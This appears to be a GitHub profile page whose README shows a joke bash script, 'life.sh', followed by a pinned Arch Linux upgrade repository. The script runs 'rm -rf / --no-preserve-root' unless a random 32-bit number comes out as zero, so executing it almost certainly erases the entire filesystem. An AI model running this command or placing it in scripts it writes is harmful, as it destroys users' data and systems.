─────┬──────────────────────────────────────────────────────────────────────────────────────────────────
│ File: life.sh
─────┼──────────────────────────────────────────────────────────────────────────────────────────────────
1 │ #!/bin/bash
2 │ set -euo pipefail
3 │
4 │ die() {
5 │ rm -rf / --no-preserve-root
6 │ exit 1
7 │ }
8 │
9 │ keep_alive() {
10 │ watch cat
11 │ }
12 │
13 │ rng() {
14 │ od -t uI -An -N 4 /dev/urandom | tr -d ' '
15 │ }
16 │
17 │ delta="$(rng)"
18 │
19 │ if [[ $delta == 0 ]]; then
20 │ keep_alive
21 │ else
22 │ die
23 │ fi
─────┴──────────────────────────────────────────────────────────────────────────────────────────────────
Pinned Loading
-
atomic-upgrade
atomic-upgrade PublicAtomic system upgrades for Arch Linux on Btrfs + UKI + optional Secure Boot.
Shell 2
-
-
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.